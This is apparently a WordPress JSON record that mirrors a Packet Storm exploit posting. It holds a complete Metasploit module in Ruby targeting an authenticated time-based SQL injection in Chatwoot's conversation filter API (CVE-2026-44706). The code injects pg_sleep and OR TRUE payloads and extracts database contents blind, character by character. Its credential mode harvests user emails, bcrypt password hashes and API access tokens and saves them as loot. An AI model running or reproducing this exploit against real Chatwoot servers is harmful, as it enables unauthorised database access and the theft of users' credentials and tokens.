{"id":61671,"date":"2026-06-10T10:43:08","date_gmt":"2026-06-10T10:43:08","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=61671"},"modified":"2026-06-10T10:43:08","modified_gmt":"2026-06-10T10:43:08","slug":"chatwoot-4111-sql-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=61671","title":{"rendered":"\ud83d\udcc4 Chatwoot 4.11.1 SQL Injection_PACKETSTORM:223093"},"content":{"rendered":"

{“lastseen”:”2026-06-10T15:33:37″,”description”:”This Metasploit module targets an authenticated SQL injection vulnerability in the conversation filtering functionality of Chatwoot instances up to version 4.11.1…”,”published”:”2026-06-10T00:00:00″,”modified”:”2026-06-10T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Chatwoot 4.11.1 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:223093″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-44706″],”sourceData”:”==================================================================================================================================\\n | # Title : Chatwoot 4.11.1 FilterService SQL Injection Module for Authenticated Exposure Validation and Database Extraction |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/www.chatwoot.com |\\n ==================================================================================================================================\\n \\n [+] Summary : module targets an authenticated SQL injection vulnerability in the conversation filtering functionality of Chatwoot instances up to version 4.11.1.\\n \\n \\n [+] POC : \\n \\n ##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule \\u003c Msf::Auxiliary\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Auxiliary::Report\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Chatwoot SQL Injection (CVE-CVE-2026-44706) – FilterService#lt_gt_filter’,\\n ‘Description’ =\\u003e %q{\\n This module exploits a time-based SQL injection vulnerability in Chatwoot\\n versions \\u003c= 4.11.1. The vulnerability exists in the conversation filter\\n functionality, allowing an authenticated attacker to execute arbitrary\\n SQL queries, extract sensitive data, and retrieve user credentials.\\n },\\n ‘Author’ =\\u003e [‘indoushka’],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [\\n [‘URL’, ‘https:\/\/hakaisecurity.io’],\\n [‘CVE’, ‘CVE-2026-44706’] \\n ],\\n ‘DisclosureDate’ =\\u003e ‘2026-06-09’,\\n ‘Platform’ =\\u003e ‘ruby’,\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Targets’ =\\u003e [[‘Automatic’, {}]],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS]\\n }\\n )\\n )\\n \\n register_options([\\n OptString.new(‘TARGETURI’, [true, ‘Base path for Chatwoot’, ‘\/’]),\\n OptString.new(‘API_TOKEN’, [true, ‘Chatwoot API access token’, ”]),\\n OptInt.new(‘ACCOUNT_ID’, [true, ‘Target account ID’, 1]),\\n OptEnum.new(‘ACTION’, [true, ‘Action to perform’, ‘check’, [‘check’, ‘timebased’, ‘extract’, ‘creds’]]),\\n OptString.new(‘SQL_QUERY’, [false, ‘SQL query for extract mode’, ‘SELECT version()’]),\\n OptInt.new(‘MAX_LEN’, [false, ‘Maximum string length for extraction’, 200]),\\n OptInt.new(‘SLEEP_TIME’, [false, ‘Time in seconds for sleep-based injection’, 2]),\\n OptFloat.new(‘THRESHOLD’, [false, ‘Time threshold for detecting sleep (seconds)’, 1.5])\\n ])\\n end\\n \\n def sleep_time\\n datastore[‘SLEEP_TIME’]\\n end\\n \\n def threshold\\n datastore[‘THRESHOLD’]\\n end\\n \\n def build_payload(injected_sql)\\n value = \\”2024-01-01′::date #{injected_sql} ‘epoch’::date \\u003e ‘2024-01-01\\”\\n {\\n ‘payload’ =\\u003e [\\n {\\n ‘attribute_key’ =\\u003e ‘created_at’,\\n ‘filter_operator’ =\\u003e ‘is_greater_than’,\\n ‘values’ =\\u003e [value],\\n ‘query_operator’ =\\u003e nil\\n }\\n ]\\n }\\n end\\n \\n def send_filter_request(payload, timeout = 60)\\n uri = normalize_uri(target_uri.path, \\”\/api\/v1\/accounts\/#{datastore[‘ACCOUNT_ID’]}\/conversations\/filter\\”)\\n \\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e uri,\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘headers’ =\\u003e {\\n ‘api_access_token’ =\\u003e datastore[‘API_TOKEN’]\\n },\\n ‘data’ =\\u003e payload.to_json,\\n ‘timeout’ =\\u003e timeout\\n )\\n \\n res\\n rescue ::Rex::ConnectionError, ::Rex::TimeoutError =\\u003e e\\n print_error(\\”Request failed: #{e.message}\\”)\\n nil\\n end\\n \\n def blind_check(condition)\\n sqli = \\”AND (SELECT CASE WHEN (#{condition}) THEN pg_sleep(#{sleep_time}) ELSE pg_sleep(0) END)::text != ‘x’ OR\\”\\n payload = build_payload(sqli)\\n \\n start_time = Time.now\\n send_filter_request(payload, sleep_time + 30)\\n elapsed = Time.now – start_time\\n \\n elapsed \\u003e= threshold\\n end\\n \\n def extract_int(expression, low = 0, high = 10000)\\n while low \\u003c= high\\n mid = (low + high) \/ 2\\n \\n if blind_check(\\”(#{expression}) = #{mid}\\”)\\n return mid\\n elsif blind_check(\\”(#{expression}) \\u003e #{mid}\\”)\\n low = mid + 1\\n else\\n high = mid – 1\\n end\\n end\\n nil\\n end\\n \\n def extract_string(expression, max_len = 200, charset = nil)\\n charset ||= ((‘a’..’z’).to_a + (‘A’..’Z’).to_a + (‘0’..’9′).to_a + \\n [‘@’, ‘.’, ‘_’, ‘-‘, ‘:’, ‘$’, ‘\/’, ‘ ‘, ‘!’, ‘#’, ‘%’, ‘^’, ‘\\u0026’, ‘*’,\\n ‘(‘, ‘)’, ‘+’, ‘=’, ‘[‘, ‘]’, ‘{‘, ‘}’, ‘|’, ‘;’, \\”‘\\”, ‘,’, ‘\\u003c’, ‘\\u003e’,\\n ‘?’, ‘~’, ‘`’, ‘\\”‘, ‘\\\\\\\\’])\\n \\n length = extract_int(\\”length((#{expression})::text)\\”, 0, max_len)\\n return ” unless length\\n \\n print_status(\\”Extracting #{length} characters…\\”)\\n \\n result = ”\\n (1..length).each do |pos|\\n found = false\\n charset.each do |ch|\\n esc = ch.gsub(\\”‘\\”, \\””\\”)\\n condition = \\”substring((#{expression})::text,#{pos},1) = ‘#{esc}’\\”\\n \\n if blind_check(condition)\\n result \\u003c\\u003c ch\\n print(ch)\\n found = true\\n break\\n end\\n end\\n \\n result \\u003c\\u003c ‘?’ unless found\\n print(‘?’) unless found\\n end\\n \\n print_line\\n result\\n end\\n \\n def check_vulnerability\\n print_status(\\”Checking vulnerability with OR TRUE bypass…\\”)\\n normal_payload = {\\n ‘payload’ =\\u003e [\\n {\\n ‘attribute_key’ =\\u003e ‘created_at’,\\n ‘filter_operator’ =\\u003e ‘is_greater_than’,\\n ‘values’ =\\u003e [‘2099-01-01’],\\n ‘query_operator’ =\\u003e nil\\n }\\n ]\\n }\\n \\n normal_res = send_filter_request(normal_payload)\\n return false unless normal_res\\u0026.code == 200\\n normal_count = JSON.parse(normal_res.body).dig(‘meta’, ‘all_count’) || 0\\n malicious_res = send_filter_request(build_payload(‘OR TRUE OR’))\\n return false unless malicious_res\\u0026.code == 200\\n malicious_count = JSON.parse(malicious_res.body).dig(‘meta’, ‘all_count’) || 0\\n \\n print_status(\\”Normal count: #{normal_count} | Malicious count: #{malicious_count}\\”)\\n \\n if malicious_count \\u003e normal_count\\n print_good(\\”SQL injection confirmed!\\”)\\n return true\\n else\\n print_error(\\”Inconclusive – target may not be vulnerable\\”)\\n return false\\n end\\n end\\n \\n def timebased_test\\n print_status(\\”Testing time-based injection…\\”)\\n start_time = Time.now\\n send_filter_request(build_payload(\\”AND (SELECT pg_sleep(0))::text != ‘x’ OR\\”))\\n base_time = Time.now – start_time\\n print_status(\\”Baseline time: #{‘%.2f’ % base_time}s\\”)\\n start_time = Time.now\\n send_filter_request(build_payload(\\”AND (SELECT pg_sleep(3))::text != ‘x’ OR\\”))\\n sleep_time_actual = Time.now – start_time\\n print_status(\\”Sleep(3) time: #{‘%.2f’ % sleep_time_actual}s\\”)\\n \\n delta = sleep_time_actual – base_time\\n print_status(\\”Delta: #{‘%.2f’ % delta}s\\”)\\n \\n if delta \\u003e= 2.5\\n print_good(\\”Time-based injection confirmed!\\”)\\n else\\n print_error(\\”Time-based injection may not be exploitable\\”)\\n end\\n end\\n \\n def extract_data\\n query = datastore[‘SQL_QUERY’]\\n max_len = datastore[‘MAX_LEN’]\\n \\n print_status(\\”Extracting: #{query}\\”)\\n result = extract_string(query, max_len)\\n \\n if result.present?\\n print_good(\\”Result: #{result}\\”)\\n store_loot(‘chatwoot_sql_extract’, ‘text\/plain’, rhost, result, ‘sql_extract.txt’, \\”Extracted SQL query result\\”)\\n else\\n print_error(\\”Extraction failed\\”)\\n end\\n end\\n \\n def extract_credentials\\n print_status(\\”Extracting user credentials…\\”)\\n print_status(\\”Counting users…\\”)\\n user_count = extract_int(\\”SELECT count(*) FROM users\\”, 0, 100)\\n \\n unless user_count \\u0026\\u0026 user_count \\u003e 0\\n print_error(\\”Could not determine user count\\”)\\n return\\n end\\n \\n print_good(\\”Found #{user_count} user(s)\\”)\\n \\n creds = []\\n hc_charset = (‘a’..’z’).to_a + (‘0’..’9′).to_a + [‘$’, ‘2’, ‘a’, ‘b’, ‘1’, ‘0’, ‘.’, ‘\/’] + (‘A’..’Z’).to_a\\n ec_charset = (‘a’..’z’).to_a + (‘0’..’9′).to_a + [‘@’, ‘.’, ‘_’, ‘-‘, ‘+’] + (‘A’..’Z’).to_a\\n \\n (0…user_count).each do |i|\\n print_status(\\”Processing user #{i + 1}\/#{user_count}\\”)\\n \\n uid = extract_int(\\”SELECT id FROM users ORDER BY id LIMIT 1 OFFSET #{i}\\”, 1, 100000)\\n next unless uid\\n \\n print_status(\\” ID: #{uid}\\”)\\n \\n email = extract_string(\\”SELECT email FROM users WHERE id=#{uid}\\”, 100, ec_charset)\\n password_hash = extract_string(\\”SELECT encrypted_password FROM users WHERE id=#{uid}\\”, 60, hc_charset)\\n token = extract_string(\\”SELECT token FROM access_tokens WHERE owner_type=’User’ AND owner_id=#{uid} LIMIT 1\\”, 30)\\n \\n creds \\u003c\\u003c {\\n id: uid,\\n email: email,\\n hash: password_hash,\\n token: token\\n }\\n \\n print_good(\\” Email: #{email}\\”) if email.present?\\n print_good(\\” Hash: #{password_hash}\\”) if password_hash.present?\\n print_good(\\” Token: #{token}\\”) if token.present?\\n end\\n creds.each do |cred|\\n report_cred(\\n user: cred[:email],\\n hash: cred[:hash],\\n private_type: :nonreplayable_hash,\\n private_data: cred[:hash],\\n jtr_format: ‘bcrypt’\\n ) if cred[:hash].present?\\n \\n report_cred(\\n user: cred[:email],\\n private_type: :password,\\n private_data: cred[:token]\\n ) if cred[:token].present?\\n end\\n loot_data = JSON.pretty_generate(creds)\\n store_loot(‘chatwoot_credentials’, ‘application\/json’, rhost, loot_data, ‘chatwoot_creds.json’, ‘Extracted credentials’)\\n print_good(\\”Credentials saved to loot\\”)\\n end\\n \\n def report_cred(opts = {})\\n return unless opts[:user].present? \\u0026\\u0026 opts[:private_data].present?\\n \\n credential_data = {\\n origin_type: :service,\\n module_fullname: fullname,\\n username: opts[:user],\\n private_data: opts[:private_data],\\n private_type: opts[:private_type] || :password,\\n workspace_id: myworkspace.id,\\n address: rhost,\\n port: rport,\\n service_name: ‘chatwoot’,\\n protocol: ‘tcp’\\n }\\n create_credential(credential_data)\\n rescue =\\u003e e\\n print_error(\\”Failed to report credential: #{e.message}\\”)\\n end\\n \\n def run\\n unless datastore[‘API_TOKEN’].present?\\n print_error(\\”API_TOKEN is required\\”)\\n return\\n end\\n print_status(\\”Verifying authentication…\\”)\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘\/api\/v1\/profile’),\\n ‘headers’ =\\u003e { ‘api_access_token’ =\\u003e datastore[‘API_TOKEN’] }\\n )\\n \\n unless res \\u0026\\u0026 res.code == 200\\n print_error(\\”Authentication failed – invalid token or URL\\”)\\n return\\n end\\n begin\\n profile = JSON.parse(res.body)\\n print_good(\\”Authenticated as: #{profile[‘name’]} (#{profile[’email’]}) – Account ID: #{datastore[‘ACCOUNT_ID’]}\\”)\\n rescue\\n print_status(\\”Authentication successful\\”)\\n end\\n case datastore[‘ACTION’]\\n when ‘check’\\n check_vulnerability\\n when ‘timebased’\\n timebased_test\\n when ‘extract’\\n extract_data\\n when ‘creds’\\n extract_credentials\\n end\\n end\\n end\\n \\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/223093″,”cvss”:{“score”:8.5,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:C\/C:H\/I:L\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/223093\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-06-10T15:33:37″,”description”:”This Metasploit module targets an authenticated SQL injection vulnerability in the conversation filtering functionality of Chatwoot instances up to version 4.11.1…”,”published”:”2026-06-10T00:00:00″,”modified”:”2026-06-10T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Chatwoot 4.11.1 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:223093″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-44706″],”sourceData”:”==================================================================================================================================\\n…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,44,12,15,13,53,7,11,5],"class_list":["post-61671","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-85","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Chatwoot 4.11.1 SQL Injection_PACKETSTORM:223093 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=61671\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Chatwoot 4.11.1 SQL Injection_PACKETSTORM:223093 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-06-10T15:33:37″,”description”:”This Metasploit module targets an authenticated SQL injection vulnerability in the conversation filtering functionality of Chatwoot instances up to version 4.11.1…”,”published”:”2026-06-10T00:00:00″,”modified”:”2026-06-10T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Chatwoot 4.11.1 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:223093″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-44706″],”sourceData”:”==================================================================================================================================n...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=61671\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-06-10T10:43:08+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"10 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=61671#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=61671\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Chatwoot 4.11.1 SQL Injection_PACKETSTORM:223093\",\"datePublished\":\"2026-06-10T10:43:08+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=61671\"},\"wordCount\":1815,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-8.5\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=61671#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=61671\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=61671\",\"name\":\"\ud83d\udcc4 Chatwoot 4.11.1 SQL Injection_PACKETSTORM:223093 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-06-10T10:43:08+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=61671#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=61671\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=61671#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Chatwoot 4.11.1 SQL Injection_PACKETSTORM:223093\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Chatwoot 4.11.1 SQL Injection_PACKETSTORM:223093 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=61671","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Chatwoot 4.11.1 SQL Injection_PACKETSTORM:223093 - zero redgem","og_description":"{“lastseen”:”2026-06-10T15:33:37″,”description”:”This Metasploit module targets an authenticated SQL injection vulnerability in the conversation filtering functionality of Chatwoot instances up to version 4.11.1…”,”published”:”2026-06-10T00:00:00″,”modified”:”2026-06-10T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Chatwoot 4.11.1 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:223093″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-44706″],”sourceData”:”==================================================================================================================================n...","og_url":"https:\/\/zero.redgem.net\/?p=61671","og_site_name":"zero redgem","article_published_time":"2026-06-10T10:43:08+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"10 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=61671#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=61671"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Chatwoot 4.11.1 SQL Injection_PACKETSTORM:223093","datePublished":"2026-06-10T10:43:08+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=61671"},"wordCount":1815,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-8.5","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=61671#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=61671","url":"https:\/\/zero.redgem.net\/?p=61671","name":"\ud83d\udcc4 Chatwoot 4.11.1 SQL Injection_PACKETSTORM:223093 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-06-10T10:43:08+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=61671#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=61671"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=61671#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Chatwoot 4.11.1 SQL Injection_PACKETSTORM:223093"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/61671","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=61671"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/61671\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=61671"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=61671"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=61671"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}